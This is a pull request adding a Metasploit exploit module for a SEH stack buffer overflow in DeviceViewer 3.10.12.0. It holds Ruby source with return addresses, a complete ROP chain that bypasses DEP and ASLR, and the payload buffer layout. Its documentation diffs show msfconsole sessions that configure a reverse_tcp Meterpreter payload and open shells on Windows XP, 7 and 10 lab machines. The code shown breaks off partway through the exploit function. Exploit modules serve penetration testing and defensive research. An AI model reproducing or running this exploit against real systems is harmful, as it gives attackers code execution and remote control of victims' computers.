### PR TITLE
Added DeviceViewer Stack Buffer Overflow Exploit

### DIFF
--- a/documentation/modules/exploit/windows/fileformat/device_viewer.md
+++ b/documentation/modules/exploit/windows/fileformat/device_viewer.md
@@ -1,13 +1,8 @@
 ## Vulnerable Application
 
-This module exploits a SEH stack buffer overflow in DeviceViewer version 3.10.12.0. By creating a specially crafted file and copying its content in the "User" login field, an attacker will be able to gain arbitrary code execution.
+This module exploits a SEH stack buffer overflow in DeviceViewer version 3.10.12.0. By creating a specially crafted "Username" and copying its value in the DeviceViewer's "User" login field, an attacker will be able to gain arbitrary code execution in the context of currently logged-in user.
 
 Link to vulnerable software [EDB](https://www.exploit-db.com/apps/4d10486a079bd1f1864c30e86cd2aa80-DeviceViewer.exe) - [VoidSec](https://github.com/VoidSec/Exploit-Development/blob/master/windows/x86/local/DeviceViewer_v.3.10.12.0/DeviceViewer.exe)
-
-## Test Results
-  * Windows XP SP3 Pro x64 (DEP & ASLR disabled) - trigger
-  * Windows 7 x86 (DEP & ASLR disabled) - trigger
-  * Windows 10 Pro x64 v.1909 Build 18363.720 (DEP & ASLR enabled) - trigger
 
 ## Verification Steps
   Example steps in this format (is also in the PR):
@@ -27,7 +22,7 @@ Link to vulnerable software [EDB](https://www.exploit-db.com/apps/4d10486a079bd1
   13. Device Viewer's will present a login prompt
   14. Do: paste the content of `DeviceViewer_v.3.10.12.0_exploit.txt` in the "User" field
   15. Do: press the "Login" button
-  16. The handler will receive the newly created session
+  16. The handler will receive the newly created session as the Windows currently logged-in user
  
 ## Options
 
@@ -36,10 +31,17 @@ Link to vulnerable software [EDB](https://www.exploit-db.com/apps/4d10486a079bd1
   The file name
 
 ## Scenarios
-### DeviceViewer v.3.10.12.0 on Windows 10 (Pro x64 v.1909 Build 18363.720, DEP & ASLR enabled)
+
+### DeviceViewer v.3.10.12.0 on Windows XP Pro x86 v.5.1.2600 SP 3 Build 2600 (ASLR and DEP are disabled on default configuration)
 
 ```
 msf5 > use exploit/windows/fileformat/device_viewer 
+msf5 exploit(windows/fileformat/device_viewer) > set target 2
+target => 2
+msf5 exploit(windows/fileformat/device_viewer) > set payload windows/meterpreter/reverse_tcp
+payload => windows/meterpreter/reverse_tcp
+msf5 exploit(windows/fileformat/device_viewer) > set lhost 192.168.0.56
+lhost => 192.168.0.56
 msf5 exploit(windows/fileformat/device_viewer) > show options
 
 Module options (exploit/windows/fileformat/device_viewer):
@@ -49,67 +51,165 @@ Module options (exploit/windows/fileformat/device_viewer):
    FILENAME  DeviceViewer_v.3.10.12.0_exploit.txt  no        The file name.
 
 
+Payload options (windows/meterpreter/reverse_tcp):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   EXITFUNC  seh              yes       Exit technique (Accepted: '', seh, thread, process, none)
+   LHOST     192.168.0.56     yes       The listen address (an interface may be specified)
+   LPORT     4444             yes       The listen port
+
+   **DisablePayloadHandler: True   (no handler will be created!)**
+
+
 Exploit target:
 
    Id  Name
    --  ----
-   0   DeviceViewer v.3.10.12.0 - Windows 10 Pro x64 (DEP + ASLR Bypass)
+   2   DeviceViewer v.3.10.12.0 - Windows XP Pro x86 SEH
 
 
-msf5 exploit(windows/fileformat/device_viewer) > set payload windows/meterpreter/reverse_tcp
-payload => windows/meterpreter/reverse_tcp
-msf5 exploit(windows/fileformat/device_viewer) > set lhost 192.168.206.1
-lhost => 192.168.206.1
 msf5 exploit(windows/fileformat/device_viewer) > run
 
-[*] Trying target DeviceViewer v.3.10.12.0 - Windows 10 Pro x64 (DEP + ASLR Bypass)...
 [*] Creating 'DeviceViewer_v.3.10.12.0_exploit.txt' file ...
-[+] DeviceViewer_v.3.10.12.0_exploit.txt stored at /home/kali/.msf4/local/DeviceViewer_v.3.10.12.0_exploit.txt
-msf5 exploit(windows/fileformat/device_viewer) > 
+[+] DeviceViewer_v.3.10.12.0_exploit.txt stored at /root/.msf4/local/DeviceViewer_v.3.10.12.0_exploit.txt
+
 msf5 exploit(windows/fileformat/device_viewer) > use exploit/multi/handler 
-msf5 exploit(multi/handler) > show options
+msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
+payload => windows/meterpreter/reverse_tcp
+msf5 exploit(multi/handler) > set lhost 192.168.0.56
+lhost => 192.168.0.56
+msf5 exploit(multi/handler) > run
 
-Module options (exploit/multi/handler):
+[*] Started reverse TCP handler on 192.168.0.56:4444 
+[*] Sending stage (176195 bytes) to 192.168.0.244
+[*] Meterpreter session 1 opened (192.168.0.56:4444 -> 192.168.0.244:1065) at 2020-05-07 14:25:38 +0200
 
-   Name  Current Setting  Required  Description
-   ----  ---------------  --------  -----------
+meterpreter > sysinfo
+Computer        : SYSOP-D8827A2B3
+OS              : Windows XP (5.1 Build 2600, Service Pack 3).
+Architecture    : x86
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x86/windows
+meterpreter > getuid
+Server username: SYSOP-D8827A2B3\Administrator
+```
+
+### DeviceViewer v.3.10.12.0 on Windows 7 Pro x86 v.6.1.7601 SP 1 Build 7601 (Windows enforce ASLR and DEP automatically on default configuration)
+```
+msf5 > use exploit/windows/fileformat/device_viewer 
+msf5 exploit(windows/fileformat/device_viewer) > set target 1
+target => 1
+msf5 exploit(windows/fileformat/device_viewer) > set payload windows/meterpreter/reverse_tcp
+payload => windows/meterpreter/reverse_tcp
+msf5 exploit(windows/fileformat/device_viewer) > set lhost 192.168.0.56
+lhost => 192.168.0.56
+msf5 exploit(windows/fileformat/device_viewer) > show options
+
+Module options (exploit/windows/fileformat/device_viewer):
+
+   Name      Current Setting                       Required  Description
+   ----      ---------------                       --------  -----------
+   FILENAME  DeviceViewer_v.3.10.12.0_exploit.txt  no        The file name.
+
+
+Payload options (windows/meterpreter/reverse_tcp):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   EXITFUNC  seh              yes       Exit technique (Accepted: '', seh, thread, process, none)
+   LHOST     192.168.0.56     yes       The listen address (an interface may be specified)
+   LPORT     4444             yes       The listen port
+
+   **DisablePayloadHandler: True   (no handler will be created!)**
 
 
 Exploit target:
 
    Id  Name
    --  ----
-   0   Wildcard Target
+   1   DeviceViewer v.3.10.12.0 - Windows 7 (DEP + ASLR Bypass)
 
 
+msf5 exploit(windows/fileformat/device_viewer) > run
+
+[*] Creating 'DeviceViewer_v.3.10.12.0_exploit.txt' file ...
+[+] DeviceViewer_v.3.10.12.0_exploit.txt stored at /root/.msf4/local/DeviceViewer_v.3.10.12.0_exploit.txt
+
+msf5 exploit(windows/fileformat/device_viewer) > use exploit/multi/handler 
 msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
 payload => windows/meterpreter/reverse_tcp
-msf5 exploit(multi/handler) > set lhost 192.168.206.1
-lhost => 192.168.206.1
+msf5 exploit(multi/handler) > set lhost 192.168.0.56
+lhost => 192.168.0.56
 msf5 exploit(multi/handler) > run
 
-[*] Started reverse TCP handler on 192.168.206.1:4444 
-sf5 exploit(windows/fileformat/device_viewer) > use exploit/multi/handler 
-msf5 exploit(multi/handler) > show options
+[*] Started reverse TCP handler on 192.168.0.56:4444 
 
-Module options (exploit/multi/handler):
+PUT HERE THE SHELL INFO ON WIN 7
+```
 
-   Name  Current Setting  Required  Description
-   ----  ---------------  --------  -----------
+### DeviceViewer v.3.10.12.0  Windows 10 Pro x64 v.1909 Build 18363.720 (Windows enforce ASLR and DEP automatically on default configuration)
+```
+msf5 > use exploit/windows/fileformat/device_viewer 
+msf5 exploit(windows/fileformat/device_viewer) > set target 0
+target => 0
+msf5 exploit(windows/fileformat/device_viewer) > set payload windows/meterpreter/reverse_tcp
+payload => windows/meterpreter/reverse_tcp
+msf5 exploit(windows/fileformat/device_viewer) > set lhost 192.168.0.56
+lhost => 192.168.0.56
+msf5 exploit(windows/fileformat/device_viewer) > show options
+
+Module options (exploit/windows/fileformat/device_viewer):
+
+   Name      Current Setting                       Required  Description
+   ----      ---------------                       --------  -----------
+   FILENAME  DeviceViewer_v.3.10.12.0_exploit.txt  no        The file name.
+
+
+Payload options (windows/meterpreter/reverse_tcp):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   EXITFUNC  seh              yes       Exit technique (Accepted: '', seh, thread, process, none)
+   LHOST     192.168.0.56     yes       The listen address (an interface may be specified)
+   LPORT     4444             yes       The listen port
+
+   **DisablePayloadHandler: True   (no handler will be created!)**
 
 
 Exploit target:
 
    Id  Name
    --  ----
-   0   Wildcard Target
+   0   DeviceViewer v.3.10.12.0 - Windows 10 (DEP + ASLR Bypass)
 
 
+msf5 exploit(windows/fileformat/device_viewer) > run
+
+[*] Creating 'DeviceViewer_v.3.10.12.0_exploit.txt' file ...
+[+] DeviceViewer_v.3.10.12.0_exploit.txt stored at /root/.msf4/local/DeviceViewer_v.3.10.12.0_exploit.txt
+
+msf5 exploit(windows/fileformat/device_viewer) > use exploit/multi/handler 
 msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
 payload => windows/meterpreter/reverse_tcp
-msf5 exploit(multi/handler) > set lhost 192.168.206.1
-lhost => 192.168.206.1
+msf5 exploit(multi/handler) > set lhost 192.168.0.56
+lhost => 192.168.0.56
 msf5 exploit(multi/handler) > run
 
-[*] Started reverse TCP handler on 192.168.206.1:4444 
+[*] Started reverse TCP handler on 192.168.0.56:4444 
+[*] Sending stage (176195 bytes) to 192.168.0.61
+[*] Meterpreter session 1 opened (192.168.0.56:4444 -> 192.168.0.61:49851) at 2020-05-07 15:40:48 +0200
+
+meterpreter > sysinfo
+Computer        : DESKTOP-81HH37O
+OS              : Windows 10 (10.0 Build 18363).
+Architecture    : x64
+System Language : en_GB
+Domain          : WORKGROUP
+Logged On Users : 1
+Meterpreter     : x86/windows
+meterpreter > getuid
+Server username: DESKTOP-81HH37O\user
 ```

--- a/documentation/modules/exploit/windows/fileformat/device_viewer.md
+++ b/documentation/modules/exploit/windows/fileformat/device_viewer.md
@@ -40,8 +40,8 @@ msf5 exploit(windows/fileformat/device_viewer) > set target 2
 target => 2
 msf5 exploit(windows/fileformat/device_viewer) > set payload windows/meterpreter/reverse_tcp
 payload => windows/meterpreter/reverse_tcp
-msf5 exploit(windows/fileformat/device_viewer) > set lhost 192.168.0.56
-lhost => 192.168.0.56
+msf5 exploit(windows/fileformat/device_viewer) > set lhost 192.168.0.4
+lhost => 192.168.0.4
 msf5 exploit(windows/fileformat/device_viewer) > show options
 
 Module options (exploit/windows/fileformat/device_viewer):
@@ -56,7 +56,7 @@ Payload options (windows/meterpreter/reverse_tcp):
    Name      Current Setting  Required  Description
    ----      ---------------  --------  -----------
    EXITFUNC  seh              yes       Exit technique (Accepted: '', seh, thread, process, none)
-   LHOST     192.168.0.56     yes       The listen address (an interface may be specified)
+   LHOST     192.168.0.4      yes       The listen address (an interface may be specified)
    LPORT     4444             yes       The listen port
 
    **DisablePayloadHandler: True   (no handler will be created!)**
@@ -77,13 +77,13 @@ msf5 exploit(windows/fileformat/device_viewer) > run
 msf5 exploit(windows/fileformat/device_viewer) > use exploit/multi/handler 
 msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
 payload => windows/meterpreter/reverse_tcp
-msf5 exploit(multi/handler) > set lhost 192.168.0.56
-lhost => 192.168.0.56
+msf5 exploit(multi/handler) > set lhost 192.168.0.4
+lhost => 192.168.0.4
 msf5 exploit(multi/handler) > run
 
-[*] Started reverse TCP handler on 192.168.0.56:4444 
+[*] Started reverse TCP handler on 192.168.0.4:4444 
 [*] Sending stage (176195 bytes) to 192.168.0.244
-[*] Meterpreter session 1 opened (192.168.0.56:4444 -> 192.168.0.244:1065) at 2020-05-07 14:25:38 +0200
+[*] Meterpreter session 1 opened (192.168.0.4:4444 -> 192.168.0.244:1065) at 2020-05-07 14:25:38 +0200
 
 meterpreter > sysinfo
 Computer        : SYSOP-D8827A2B3
@@ -104,8 +104,8 @@ msf5 exploit(windows/fileformat/device_viewer) > set target 1
 target => 1
 msf5 exploit(windows/fileformat/device_viewer) > set payload windows/meterpreter/reverse_tcp
 payload => windows/meterpreter/reverse_tcp
-msf5 exploit(windows/fileformat/device_viewer) > set lhost 192.168.0.56
-lhost => 192.168.0.56
+msf5 exploit(windows/fileformat/device_viewer) > set lhost 192.168.0.4
+lhost => 192.168.0.4
 msf5 exploit(windows/fileformat/device_viewer) > show options
 
 Module options (exploit/windows/fileformat/device_viewer):
@@ -120,7 +120,7 @@ Payload options (windows/meterpreter/reverse_tcp):
    Name      Current Setting  Required  Description
    ----      ---------------  --------  -----------
    EXITFUNC  seh              yes       Exit technique (Accepted: '', seh, thread, process, none)
-   LHOST     192.168.0.56     yes       The listen address (an interface may be specified)
+   LHOST     192.168.0.4      yes       The listen address (an interface may be specified)
    LPORT     4444             yes       The listen port
 
    **DisablePayloadHandler: True   (no handler will be created!)**
@@ -141,13 +141,24 @@ msf5 exploit(windows/fileformat/device_viewer) > run
 msf5 exploit(windows/fileformat/device_viewer) > use exploit/multi/handler 
 msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
 payload => windows/meterpreter/reverse_tcp
-msf5 exploit(multi/handler) > set lhost 192.168.0.56
-lhost => 192.168.0.56
+msf5 exploit(multi/handler) > set lhost 192.168.0.4
+lhost => 192.168.0.4
 msf5 exploit(multi/handler) > run
 
-[*] Started reverse TCP handler on 192.168.0.56:4444 
+[*] Started reverse TCP handler on 192.168.0.4:4444 
+[*] Sending stage (176195 bytes) to 192.168.0.219
+[*] Meterpreter session 1 opened (192.168.0.4:4444 -> 192.168.0.219:49206) at 2020-05-08 10:29:18 +0200
 
-PUT HERE THE SHELL INFO ON WIN 7
+meterpreter > sysinfo
+Computer        : WIN-C70LNBNJMC8
+OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
+Architecture    : x86
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 1
+Meterpreter     : x86/windows
+meterpreter > getuid
+Server username: WIN-C70LNBNJMC8\Admin
 ```
 
 ### DeviceViewer v.3.10.12.0  Windows 10 Pro x64 v.1909 Build 18363.720 (Windows enforce ASLR and DEP automatically on default configuration)
@@ -157,8 +168,8 @@ msf5 exploit(windows/fileformat/device_viewer) > set target 0
 target => 0
 msf5 exploit(windows/fileformat/device_viewer) > set payload windows/meterpreter/reverse_tcp
 payload => windows/meterpreter/reverse_tcp
-msf5 exploit(windows/fileformat/device_viewer) > set lhost 192.168.0.56
-lhost => 192.168.0.56
+msf5 exploit(windows/fileformat/device_viewer) > set lhost 192.168.0.4
+lhost => 192.168.0.4
 msf5 exploit(windows/fileformat/device_viewer) > show options
 
 Module options (exploit/windows/fileformat/device_viewer):
@@ -173,7 +184,7 @@ Payload options (windows/meterpreter/reverse_tcp):
    Name      Current Setting  Required  Description
    ----      ---------------  --------  -----------
    EXITFUNC  seh              yes       Exit technique (Accepted: '', seh, thread, process, none)
-   LHOST     192.168.0.56     yes       The listen address (an interface may be specified)
+   LHOST     192.168.0.4      yes       The listen address (an interface may be specified)
    LPORT     4444             yes       The listen port
 
    **DisablePayloadHandler: True   (no handler will be created!)**
@@ -194,13 +205,13 @@ msf5 exploit(windows/fileformat/device_viewer) > run
 msf5 exploit(windows/fileformat/device_viewer) > use exploit/multi/handler 
 msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
 payload => windows/meterpreter/reverse_tcp
-msf5 exploit(multi/handler) > set lhost 192.168.0.56
-lhost => 192.168.0.56
+msf5 exploit(multi/handler) > set lhost 192.168.0.4
+lhost => 192.168.0.4
 msf5 exploit(multi/handler) > run
 
-[*] Started reverse TCP handler on 192.168.0.56:4444 
+[*] Started reverse TCP handler on 192.168.0.4:4444 
 [*] Sending stage (176195 bytes) to 192.168.0.61
-[*] Meterpreter session 1 opened (192.168.0.56:4444 -> 192.168.0.61:49851) at 2020-05-07 15:40:48 +0200
+[*] Meterpreter session 1 opened (192.168.0.4:4444 -> 192.168.0.61:49851) at 2020-05-07 15:40:48 +0200
 
 meterpreter > sysinfo
 Computer        : DESKTOP-81HH37O

--- a/documentation/modules/exploit/windows/fileformat/device_viewer.md
+++ b/documentation/modules/exploit/windows/fileformat/device_viewer.md
@@ -1,6 +1,6 @@
 ## Vulnerable Application
 
-This module exploits a SEH stack buffer overflow in DeviceViewer version 3.10.12.0. By creating a specially crafted "Username" and copying its value in the DeviceViewer's "User" login field, an attacker will be able to gain arbitrary code execution in the context of currently logged-in user.
+This module exploits a SEH stack buffer overflow in Shenzhen Sricctv Technology DeviceViewer version 3.10.12.0. By creating a specially crafted "Username" and copying its value in the DeviceViewer's "User" login field, an attacker will be able to gain arbitrary code execution in the context of currently logged-in user.
 
 Link to vulnerable software [EDB](https://www.exploit-db.com/apps/4d10486a079bd1f1864c30e86cd2aa80-DeviceViewer.exe) - [VoidSec](https://github.com/VoidSec/Exploit-Development/blob/master/windows/x86/local/DeviceViewer_v.3.10.12.0/DeviceViewer.exe)
 
@@ -97,7 +97,7 @@ meterpreter > getuid
 Server username: SYSOP-D8827A2B3\Administrator
 ```
 
-### DeviceViewer v.3.10.12.0 on Windows 7 Pro x86 v.6.1.7601 SP 1 Build 7601 (Windows enforce ASLR and DEP automatically on default configuration)
+### DeviceViewer v.3.10.12.0 on Windows 7 Pro x86 v.6.1.7601 SP 1 Build 7601 (Windows enforces ASLR and DEP automatically on default configuration)
 ```
 msf5 > use exploit/windows/fileformat/device_viewer 
 msf5 exploit(windows/fileformat/device_viewer) > set target 1
@@ -161,7 +161,7 @@ meterpreter > getuid
 Server username: WIN-C70LNBNJMC8\Admin
 ```
 
-### DeviceViewer v.3.10.12.0  Windows 10 Pro x64 v.1909 Build 18363.720 (Windows enforce ASLR and DEP automatically on default configuration)
+### DeviceViewer v.3.10.12.0 on Windows 10 Pro x64 v.1909 Build 18363.720 (Windows enforces ASLR and DEP automatically on default configuration)
 ```
 msf5 > use exploit/windows/fileformat/device_viewer 
 msf5 exploit(windows/fileformat/device_viewer) > set target 0

--- a/documentation/modules/exploit/windows/fileformat/device_viewer.md
+++ b/documentation/modules/exploit/windows/fileformat/device_viewer.md
@@ -32,7 +32,7 @@ Link to vulnerable software [EDB](https://www.exploit-db.com/apps/4d10486a079bd1
 
 ## Scenarios
 
-### DeviceViewer v.3.10.12.0 on Windows XP Pro x86 v.5.1.2600 SP 3 Build 2600 (ASLR and DEP are disabled on default configuration)
+### Shenzhen Sricctv Technology DeviceViewer v.3.10.12.0 on Windows XP Pro x86 v.5.1.2600 SP 3 Build 2600 (ASLR and DEP are disabled on default configuration)
 
 ```
 msf5 > use exploit/windows/fileformat/device_viewer 
@@ -97,7 +97,7 @@ meterpreter > getuid
 Server username: SYSOP-D8827A2B3\Administrator
 ```
 
-### DeviceViewer v.3.10.12.0 on Windows 7 Pro x86 v.6.1.7601 SP 1 Build 7601 (Windows enforces ASLR and DEP automatically on default configuration)
+### Shenzhen Sricctv Technology DeviceViewer v.3.10.12.0 on Windows 7 Pro x86 v.6.1.7601 SP 1 Build 7601 (Windows enforces ASLR and DEP automatically on default configuration)
 ```
 msf5 > use exploit/windows/fileformat/device_viewer 
 msf5 exploit(windows/fileformat/device_viewer) > set target 1
@@ -161,7 +161,7 @@ meterpreter > getuid
 Server username: WIN-C70LNBNJMC8\Admin
 ```
 
-### DeviceViewer v.3.10.12.0 on Windows 10 Pro x64 v.1909 Build 18363.720 (Windows enforces ASLR and DEP automatically on default configuration)
+### Shenzhen Sricctv Technology DeviceViewer v.3.10.12.0 on Windows 10 Pro x64 v.1909 Build 18363.720 (Windows enforces ASLR and DEP automatically on default configuration)
 ```
 msf5 > use exploit/windows/fileformat/device_viewer 
 msf5 exploit(windows/fileformat/device_viewer) > set target 0

--- a/documentation/modules/exploit/windows/fileformat/device_viewer.md
+++ b/documentation/modules/exploit/windows/fileformat/device_viewer.md
@@ -1,0 +1,115 @@
+## Vulnerable Application
+
+This module exploits a SEH stack buffer overflow in DeviceViewer version 3.10.12.0. By creating a specially crafted file and copying its content in the "User" login field, an attacker will be able to gain arbitrary code execution.
+
+Link to vulnerable software [EDB](https://www.exploit-db.com/apps/4d10486a079bd1f1864c30e86cd2aa80-DeviceViewer.exe) - [VoidSec](https://github.com/VoidSec/Exploit-Development/blob/master/windows/x86/local/DeviceViewer_v.3.10.12.0/DeviceViewer.exe)
+
+## Test Results
+  * Windows XP SP3 Pro x64 (DEP & ASLR disabled) - trigger
+  * Windows 7 x86 (DEP & ASLR disabled) - trigger
+  * Windows 10 Pro x64 v.1909 Build 18363.720 (DEP & ASLR enabled) - trigger
+
+## Verification Steps
+  Example steps in this format (is also in the PR):
+
+  1. Install the application on the target machine
+  2. Start msfconsole
+  3. Do: ```use exploit/windows/fileformat/device_viewer```
+  4. Do: ```set payload [windows/meterpreter/reverse_tcp]```
+  5. Do: ```set LHOST [IP]```
+  6. Do: ```exploit```
+  7. This file will be created: ```DeviceViewer_v.3.10.12.0_exploit.txt stored at /home/[USER]/.msf4/local/DeviceViewer_v.3.10.12.0_exploit.txt```
+  8. Do: ```use exploit/multi/handler```
+  9. Do: ```set payload [windows/meterpreter/reverse_tcp]```
+  10. Do: ```set LHOST [IP]```
+  11. Do: ```exploit```
+  12. Do: on the target Windows machine open Device Viewer
+  13. Device Viewer's will present a login prompt
+  14. Do: paste the content of `DeviceViewer_v.3.10.12.0_exploit.txt` in the "User" field
+  15. Do: press the "Login" button
+  16. The handler will receive the newly created session
+ 
+## Options
+
+  **FILENAME**
+
+  The file name
+
+## Scenarios
+### DeviceViewer v.3.10.12.0 on Windows 10 (Pro x64 v.1909 Build 18363.720, DEP & ASLR enabled)
+
+```
+msf5 > use exploit/windows/fileformat/device_viewer 
+msf5 exploit(windows/fileformat/device_viewer) > show options
+
+Module options (exploit/windows/fileformat/device_viewer):
+
+   Name      Current Setting                       Required  Description
+   ----      ---------------                       --------  -----------
+   FILENAME  DeviceViewer_v.3.10.12.0_exploit.txt  no        The file name.
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   DeviceViewer v.3.10.12.0 - Windows 10 Pro x64 (DEP + ASLR Bypass)
+
+
+msf5 exploit(windows/fileformat/device_viewer) > set payload windows/meterpreter/reverse_tcp
+payload => windows/meterpreter/reverse_tcp
+msf5 exploit(windows/fileformat/device_viewer) > set lhost 192.168.206.1
+lhost => 192.168.206.1
+msf5 exploit(windows/fileformat/device_viewer) > run
+
+[*] Trying target DeviceViewer v.3.10.12.0 - Windows 10 Pro x64 (DEP + ASLR Bypass)...
+[*] Creating 'DeviceViewer_v.3.10.12.0_exploit.txt' file ...
+[+] DeviceViewer_v.3.10.12.0_exploit.txt stored at /home/kali/.msf4/local/DeviceViewer_v.3.10.12.0_exploit.txt
+msf5 exploit(windows/fileformat/device_viewer) > 
+msf5 exploit(windows/fileformat/device_viewer) > use exploit/multi/handler 
+msf5 exploit(multi/handler) > show options
+
+Module options (exploit/multi/handler):
+
+   Name  Current Setting  Required  Description
+   ----  ---------------  --------  -----------
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Wildcard Target
+
+
+msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
+payload => windows/meterpreter/reverse_tcp
+msf5 exploit(multi/handler) > set lhost 192.168.206.1
+lhost => 192.168.206.1
+msf5 exploit(multi/handler) > run
+
+[*] Started reverse TCP handler on 192.168.206.1:4444 
+sf5 exploit(windows/fileformat/device_viewer) > use exploit/multi/handler 
+msf5 exploit(multi/handler) > show options
+
+Module options (exploit/multi/handler):
+
+   Name  Current Setting  Required  Description
+   ----  ---------------  --------  -----------
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Wildcard Target
+
+
+msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
+payload => windows/meterpreter/reverse_tcp
+msf5 exploit(multi/handler) > set lhost 192.168.206.1
+lhost => 192.168.206.1
+msf5 exploit(multi/handler) > run
+
+[*] Started reverse TCP handler on 192.168.206.1:4444 
+```

--- a/modules/exploits/windows/fileformat/device_viewer.rb
+++ b/modules/exploits/windows/fileformat/device_viewer.rb
@@ -39,6 +39,7 @@ class MetasploitModule < Msf::Exploit::Remote
           'Space' => 3728,
           'BadChars' => "\x81\xc4\x24\xfa\xff\xff",
           'DisableNops' => true,
+          'StackAdjustment' => -1500
         },
 
       'Targets'    =>
@@ -114,7 +115,6 @@ class MetasploitModule < Msf::Exploit::Remote
       buffer << [target.ret].pack("V") # SEH
       buffer << make_nops(384) # filler
       buffer << create_rop_chain() # ROP
-      buffer << "\x81\xc4\x24\xfa\xff\xff" # stack adj
       buffer << payload.encoded # shellcode
       buffer << make_nops(max_buff_length-buffer.length) # filler
     else

--- a/modules/exploits/windows/fileformat/device_viewer.rb
+++ b/modules/exploits/windows/fileformat/device_viewer.rb
@@ -1,0 +1,133 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::FILEFORMAT
+  include Msf::Exploit::Remote::Seh
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'    => 'Shenzhen Sricctv Technology DeviceViewer User Field Stack Buffer Overlow',
+      'Description'  => %q{
+        This exploits a SEH stack buffer overflow in DeviceViewer v.3.10.12.0 present in the 
+        username login field. In the "User" login field paste the content of the generated 
+        exploit and press "Login". This module will bypass DEP and ASLR.
+        It was successfully tested on Windows 10, Windows 7 and Windows XP SP3.
+      },
+      'License'    => MSF_LICENSE,
+      'Author'    =>
+        [
+          'Hayden Wright',  # Original discovery
+          'Paolo Stagno',  # @Void_Sec
+        ],
+      'References'  =>
+        [
+          [ 'CVE', '2019-11563' ],
+          [ 'EDB', '46779' ]
+        ],
+      'DefaultOptions' =>
+        {
+          'EXITFUNC' => 'seh',
+        },
+      'Platform'  => 'win',
+      'Payload'  =>
+        {
+          'Space' => 3728,
+          'BadChars' => "\x81\xc4\x24\xfa\xff\xff",
+          'DisableNops' => true,
+        },
+
+      'Targets'    =>
+        [
+          [ 'DeviceViewer v.3.10.12.0 - Windows 10 Pro x64 (DEP + ASLR Bypass)', # Windows 10 Pro x64 v.1909 Build 18363.720
+            {
+              'Ret'     =>  0x6ad795e9, # 0x6ad795e9 : {pivot 3324 / 0xcfc} :  # ADD ESP,0CEC # POP EBX # POP ESI # POP EDI # POP EBP # RETN    ** [avcodec-52.dll] **   |   {PAGE_EXECUTE_WRITECOPY}
+              'Offset'  =>  264
+            }
+          ],
+        [ 'DeviceViewer v.3.10.12.0 - Windows XP Pro x64, Windows 7 x86', {
+              'Ret' => 0x69901d06, #POP ESI, POP EDI, RET  avformat-54.dll
+              'Offset' => 264
+          } ],
+        ],
+      'Privileged'  => false,
+      'DisclosureDate'  => 'Apr 25 2019',
+      'DefaultTarget'  => 0))
+
+    register_options([OptString.new('FILENAME', [ false, 'The file name.', 'DeviceViewer_v.3.10.12.0_exploit.txt'])])
+
+  end
+
+  def create_rop_chain()
+    # rop chain generated with mona.py - www.corelan.be, fixed by VoidSec
+    rop_gadgets = [
+      #[---INFO:gadgets_to_set_edx:---]
+      0x6b050b5e,  # POP EAX # RETN [avcodec-52.dll]
+      0xffffffd7,  # put delta into eax (-> put 0x00000040 into edx)
+      0x6ad62214,  # ADD EAX,69 # RETN [avcodec-52.dll]
+      0x6994f1d6,  # XCHG EAX,EDX # RETN [avformat-54.dll]
+      #[---INFO:gadgets_to_set_esi:---]
+      0x6b050b5e,  # POP EAX # RETN [avcodec-52.dll]
+      0x68bab1f4,  # ptr to &VirtualProtect() [IAT avutil-51.dll]
+      0x699150dc,  # MOV EAX,DWORD PTR DS:[EAX] # RETN [avformat-54.dll]
+      0x6ae8bcd8,  # XCHG EAX,ESI # RETN [avcodec-52.dll]
+      #[---INFO:gadgets_to_set_ebx:---]
+      0x6b05be37,  # POP EAX # RETN [avcodec-52.dll]
+      0xa1a50201,  # put delta into eax (-> put 0x00000201 into ebx)
+      0x6ade3410,  # ADD EAX,5E5B0000 # POP EDI # POP EBP # RETN [avcodec-52.dll]
+      0x41414141,  # Filler (compensate)
+      0x41414141,  # Filler (compensate)
+      0x6ad5b2b4,  # PUSH EAX # POP EBX # RETN [avcodec-52.dll]
+      #[---INFO:gadgets_to_set_ebp:---]
+      0x6aec5b60,  # POP EBP # RETN [avcodec-52.dll]
+      0x6ae590cf,  # & push esp # ret  [avcodec-52.dll]
+      #[---INFO:gadgets_to_set_edi:---]
+      0x699b8706,  # POP EDI # RETN [avformat-54.dll]
+      0x6991e152,  # RETN (ROP NOP) [avformat-54.dll]
+      #[---INFO:gadgets_to_set_ecx:---]
+      0x699cc348,  # POP ECX # RETN [avformat-54.dll]
+      0x6b68c50c,  # &Writable location [avcodec-52.dll]
+      #[---INFO:gadgets_to_set_eax:---]
+      0x6b05be46,  # POP EAX # RETN [avcodec-52.dll]
+      0x90909090,  # nop
+      #[---INFO:pushad:---]
+      0x699047dc,  # PUSHAD # RETN [avformat-54.dll]
+    ].flatten.pack("V*")
+    return rop_gadgets
+
+  end
+
+  def exploit
+    max_buff_length = 4000
+    buffer = ""
+
+    if target.ret == 0x6ad795e9
+    # win 10, add rop and different layout
+    # |                                                     buffer (4000)                                                              |
+    # | garbage (254) | nSEH (4) | SEH (4) | filler (384) | rop chain (92) | stack adj (6) | shellcode (371) | filler (4000-len(buff)) |
+      buffer << make_nops(target['Offset']) # garbage
+      buffer << make_nops(4) # nSEH
+      buffer << [target.ret].pack("V") # SEH
+      buffer << make_nops(384) # filler
+      buffer << create_rop_chain() # ROP
+      buffer << "\x81\xc4\x24\xfa\xff\xff" # stack adj
+      buffer << payload.encoded # shellcode
